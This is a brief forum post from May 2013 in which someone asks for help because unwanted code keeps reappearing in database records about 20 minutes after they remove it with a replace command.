I've tried updating the records using a replace command on the fields, but 20mins
later this code pop up again!!!
Any idea on how to fix or prevent this from happening????
Seriously out of idea here....
|
May 25, 2013
|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||
